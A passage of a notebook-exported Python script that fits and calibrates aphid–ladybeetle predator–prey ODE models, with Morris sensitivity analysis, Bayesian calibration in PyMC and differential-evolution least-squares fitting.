# In[241]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
r2,
a1,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[242]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_LP1 = LP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_LP1.y
qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[243]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[244]:
df_sigmai
# In[245]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_LP1.png", dpi=300)
plt.show()
# In[246]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_LP1.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[247]:
def calculate_pest_time_derivative_series(
time_array,
u_array,
v_array,
ode_model,
model_pars
):
pest_time_derivative_values = list()
for t_idx, time in enumerate(time_array):
u = u_array[t_idx]
v = v_array[t_idx]
stacked_population = [u, v]
pest_time_derivative_value, _ = ode_model(time, stacked_population, *model_pars)
pest_time_derivative_values.append(pest_time_derivative_value)
pest_time_derivative_array = np.array(pest_time_derivative_values)
return pest_time_derivative_array
# In[248]:
pest_time_derivative_array = calculate_pest_time_derivative_series(
t_computed_LP1,
u_LP1,
v_LP1,
LP1_model,
mean_values_params
)
pest_time_derivative_array
# In[249]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_LP1, u_LP1, '-x', label='Pest population')
plt.plot(t_computed_LP1, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_LP1.png", dpi=300)
plt.show()
# In[250]:
mean_values_params = [
r1,
r2,
a1,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[251]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_LP1 = LP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_LP1.y
pest_time_derivative_array = calculate_pest_time_derivative_series(
time_range,
u_realization,
v_realization,
LP1_model,
parameters_realization
)
qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[252]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[253]:
df_sigmai
# In[254]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_LP1.png", dpi=300)
plt.show()
# In[255]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_LP1.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[256]:
@theano.compile.ops.as_op(
itypes=[
t.dvector,
t.dscalar, # r1
t.dscalar, # r2
t.dscalar, # a1
t.dscalar, # u0
t.dscalar, # v0
],
otypes=[t.dmatrix]
)
def LP1_ode_wrapper(time_exp, r1, r2, a1, u0, v0):
time_span = (time_exp.min(), time_exp.max())
args = [r1, r2, a1]
initial_conditions = np.array([u0, v0])
y_model = solve_ivp(
LP1_model,
time_span,
initial_conditions,
t_eval=time_exp,
method='LSODA',
args=args
)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
return concatenate_simulated_qoi
# In[257]:
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000
start_time = time.time()
percent_calibration = 0.95
with pm.Model() as fine_model_LP1:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
# r2_ = pm.Uniform(
# "r2",
# lower=(1.0 - percent_calibration) * r2,
# upper=(1.0 + percent_calibration) * r2,
# )
r2_ = pm.Data("r2", r2)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + percent_calibration) * a1,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"LP1_model",
LP1_ode_wrapper(
time_calibration,
r1_,
r2_,
a1_,
u0_,
v0_
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
)
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
[observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
# r2_ = pm.Uniform(
# "r2",
# lower=(1.0 - percent_calibration) * r2,
# upper=(1.0 + percent_calibration) * r2,
# )
r2_ = pm.Data("r2", r2)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + percent_calibration) * a1,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_1)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"LP1_model",
LP1_ode_wrapper(
time_calibration,
r1_,
r2_,
a1_,
u0_,
v0_
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
)
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
[observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
# r2_ = pm.Uniform(
# "r2",
# lower=(1.0 - percent_calibration) * r2,
# upper=(1.0 + percent_calibration) * r2,
# )
r2_ = pm.Data("r2", r2)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + percent_calibration) * a1,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_2)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"LP1_model",
LP1_ode_wrapper(
time_calibration,
r1_,
r2_,
a1_,
u0_,
v0_
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
)
with fine_model_LP1:
step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
# step = pm.DEMetropolisZ()
trace_calibration_LP1 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[258]:
plt.hist(trace_calibration_LP1['a1'], bins=35)
plt.show()
# In[259]:
calibration_variable_names = [
"std_deviation",
"a1",
]
# In[260]:
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
pm.plot_posterior(
trace_calibration_LP1[::plot_step],
var_names=(f"{variable}"),
kind="hist",
round_to=4,
point_estimate="mode"
)
plt.savefig(f"img/{variable}_posterior_cal_LP1.png")
# In[261]:
az.plot_pair(
trace_calibration_LP1,
var_names=calibration_variable_names,
kind="hexbin",
fill_last=False,
marginals=True,
figsize=(10, 8),
)
plt.savefig("img/marginals_cal_LP1.png")
# In[262]:
df_stats_summary = az.summary(
data=trace_calibration_LP1,
var_names=calibration_variable_names,
kind='stats',
round_to=15, # arredondamento de ponto flutuante no sumário
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[263]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
rv_mpv_values_dict = dict()
progress_bar = tqdm(variable_names)
for variable in progress_bar:
progress_bar.set_description(f"Calculating MPV from KDE for {variable}")
rv_realization_values = pm_trace[f"{variable}"]
try:
num_of_dimensions = rv_realization_values.shape[1]
except IndexError:
num_of_dimensions = 0
if num_of_dimensions == 0:
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values)
rv_mpv_values_dict[f"{variable}"] = rv_mpv_value
else:
for dimension in range(num_of_dimensions):
variable_name_decomposed = f"{variable}[{dimension}]"
rv_realization_values_decomposed = np.array(rv_realization_values[:, dimension])
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values_decomposed)
rv_mpv_values_dict[f"{variable_name_decomposed}"] = rv_mpv_value
return rv_mpv_values_dict
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
new_arviz_summary = arviz_summary.copy()
variable_names = list(rv_modes_dict.keys())
rv_mode_values = list(rv_modes_dict.values())
new_arviz_summary["mpv"] = pd.Series(data=rv_mode_values, index=variable_names)
return new_arviz_summary
# In[264]:
calibration_variable_mpv = calculate_rv_posterior_mpv(
pm_trace=trace_calibration_LP1, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_LP1.csv") # salvando em um csv para consultas
df_stats_summary
# In[265]:
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_LP1["LP1_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_LP1["LP1_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_LP1["LP1_model"], 50, axis=0)
# In[266]:
plt.figure(figsize=(15, 5))
plt.plot(
time_observations,
y_fit[:, 0],
"r",
label="Aphids (simulated)",
marker="X",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
time_observations,
y_fit[:, 1],
"b",
label="Ladybeetles (simulated)",
marker="o",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
time_observations,
aphid_observed.Density.values,
label="Aphids data",
marker="s",
linestyle="",
markersize=10
)
plt.plot(
time_observations,
ladybeetle_observed.Density.values,
label="Ladybeetles data",
marker="v",
linestyle="",
markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_LP1.png", dpi=300)
plt.show()
# In[267]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # vamos gravar as realizações em um dicionário Python tbm
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
progress_bar.set_description(f"Gathering {variable} realizations")
parameter_realization = trace_calibration_LP1.get_values(f"{variable}")
dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_LP1.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[268]:
df_realizations
# # Logistic Prey Growth FR2 model
# In[410]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def LP2_model(
t,
X,
r1 = 1,
r2 = 1,
a1 = 1,
a2 = 1,
a3 = 1,
):
u, v = X
u_prime = r1 * u - r2 * u * u - a1 * u * v / ( a2 + a3 * u )
v_prime = 0
return u_prime, v_prime
def LP2_ode_solver(
y0,
t_span,
t_eval,
r1 = 1,
r2 = 1,
a1 = 1,
a2 = 1,
a3 = 1,
):
solution_ODE = solve_ivp(
fun=LP2_model,
t_span=t_span,
y0=y0,
t_eval=t_eval,
args=(r1,r2,a1,a2,a3),
method="LSODA",
)
return solution_ODE
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[411]:
def LP2_least_squares_error_ode(
par, time_exp, f_exp, fitting_model, initial_conditions
):
args = par
f_exp1, f_exp2 = f_exp
time_span = (time_exp.min(), time_exp.max())
weighting_for_exp1_constraints = 1
weighting_for_exp2_constraints = 1
num_of_qoi = len(f_exp)
try:
y_model = fitting_model(initial_conditions, time_span, time_exp, *args)
# y_model = fitting_model(time_span, time_exp, *args)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
residual1 = f_exp1 - simulated_qoi1
residual2 = f_exp2 - simulated_qoi2
first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
objective_function = 1 / num_of_qoi * (first_term + second_term)
except ValueError:
objective_function = 1e15
return objective_function
def callback_de(xk, convergence):
"""
This function is to show the optimization procedure progress.
"""
print(f'parameters = {xk}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[412]:
from scipy import optimize
seed = 1234
r1=0.10437445097500309
r2=5.107493312221164e-07
a1=0.01929726300101605
a2=0.45099505926342665
a3=0.0002915398916649021
denom_min = 0.1
denom_max = 1.9
bounds_LP2 = [
( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
( ( r2 * denom_min ), ( r2 * denom_max ) ), # r2
( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
( ( a2 * denom_min ), ( a2 * denom_max ) ), # a2
( ( a3 * denom_min ), ( a3 * denom_max ) ), # a3
]
result_LP2 = optimize.differential_evolution(
LP2_least_squares_error_ode,
bounds=bounds_LP2,
args=(
aphid_data.Time.values,
[aphid_data.Density.values, ladybeetle_data.Density.values],
LP2_ode_solver,
y0,
),
popsize=30,
strategy="best1bin",
tol=1e-5,
recombination=0.95,
mutation=0.6,
maxiter=20000, # 2000
polish=True,
disp=True,
seed = seed, # for the sake of reproducibility
callback=callback_de,
workers=-1,
)
print(result_LP2)
# * Retrieving the calibrated parameter values:
# In[413]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
r2_deterministic,
a1_deterministic,
a2_deterministic,
a3_deterministic,
) = result_LP2.x
solution_ODE_LP2 = LP2_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_LP2.x
)
t_computed_LP2, y_computed_LP2 = solution_ODE_LP2.t, solution_ODE_LP2.y
u_LP2, v_LP2 = y_computed_LP2
parameters_dict = {
"Model": "LP2",
u"$r1$": r1_deterministic,
u"$r2$": r2_deterministic,
u"$a1$": a1_deterministic,
u"$a2$": a2_deterministic,
u"$a3$": a3_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "r2=" + str(r2_deterministic) + "\n" + "a1=" + str(a1_deterministic) + "\n" + "a2=" + str(a2_deterministic) + "\n" + "a3=" + str(a3_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[414]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_LP2, u_LP2, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_LP2, v_LP2, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[415]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
r2,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[416]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
residual_least_squares_result = LP2_least_squares_error_ode(
parameters_realization,
aphid_data.Time.values,
[u_data, v_data],
LP2_ode_solver,
y0
)
qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[417]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[418]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_LP2.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[419]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
r2,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[420]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_LP2 = LP2_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_LP2.y
qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[421]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[422]:
df_sigmai
# In[423]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_LP2.png", dpi=300)
plt.show()
# In[424]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_LP2.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[425]:
def calculate_pest_time_derivative_series(
time_array,
u_array,
v_array,
ode_model,
model_pars
):
pest_time_derivative_values = list()
for t_idx, time in enumerate(time_array):
u = u_array[t_idx]
v = v_array[t_idx]
stacked_population = [u, v]
pest_time_derivative_value, _ = ode_model(time, stacked_population, *model_pars)
pest_time_derivative_values.append(pest_time_derivative_value)
pest_time_derivative_array = np.array(pest_time_derivative_values)
return pest_time_derivative_array
# In[426]:
pest_time_derivative_array = calculate_pest_time_derivative_series(
t_computed_LP2,
u_LP2,
v_LP2,
LP2_model,
mean_values_params
)
pest_time_derivative_array
# In[427]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_LP2, u_LP2, '-x', label='Pest population')
plt.plot(t_computed_LP2, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_LP2.png", dpi=300)
plt.show()
# In[428]:
mean_values_params = [
r1,
r2,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
